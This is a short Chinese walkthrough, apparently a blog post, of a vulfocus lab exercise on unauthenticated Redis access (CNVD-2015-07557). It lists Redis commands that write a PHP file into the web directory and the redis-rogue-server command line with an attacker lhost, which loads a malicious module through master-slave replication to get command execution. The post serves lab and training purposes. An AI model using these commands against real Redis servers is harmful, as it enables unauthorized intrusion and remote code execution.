vulfocus靶场redis 未授权访问漏洞之CNVD-2015-07557

目标系统的权限不够redis 用户无法写计划任务和公钥,而且也没有开放ssh端口。

主从复制getshell,写入恶意的so文件达到执行系统命令的目的。

github上有一键可以利用的脚本

https://github.com/n0b0dyCN/redis-rogue-server.git

利用条件:需要web目录有读写权限,只有读权限会失败

工具连接:redis-rogue-server

向目标写入文件(前提是目标有网站)

config set dir /tmp #创建临时目录

config set dbfilename 1.php #写入文件

set test "<?php phpinfo(); ?>" #向文件中写入内容

bgsave #保存

save #保存

证明web目录具有写权限,可以进行利用

确认靶机有可写权限后,

利用:攻击机进入到cd redis-rogue-server文件夹里面

python3 redis-rogue-server.py --rhost 目标IP --rport 目标端口 --lhost 攻击者服务器IP

成功后,可以执行命令

ls /tmp即可得到flag

相关推荐
yuzhiboyouye28 分钟前
那xml对应的sql语法,列举一下
xml·数据库·sql
. . . . .1 小时前
乐观锁 vs 悲观锁
数据库·sql
Leo.yuan1 小时前
2026年多数据库实时同步的四种架构方案及工具推荐
数据库·架构
hasty1 小时前
Origin 校验不是身份认证:MySQL MCP Server 漏洞给 AI 平台的警告
数据库·mysql·安全
梦想平凡2 小时前
百游棋牌源代码开发搭建教程(五):房间创建、座位分配与请求幂等实现
前端·javascript·数据库·源代码管理
凤山老林3 小时前
Spring Boot 整合 Flowable 的企业级落地指南
数据库·spring boot·后端·flowable·工作流
企业数字化笔记3 小时前
AI写的系统出现504怎么办?接口超时和数据库慢查询排查
数据库·后端
玄芯散人3 小时前
【筑基·047】内存Hierarchy:寄存器到硬盘的速度差
缓存·内存·计算机基础
momo061173 小时前
Redis新手入门 -- 学习笔记
redis·后端
2601_962218613 小时前
万象生鲜系统订单全生命周期状态同步技术实现业务可视
大数据·数据库·人工智能·python·算法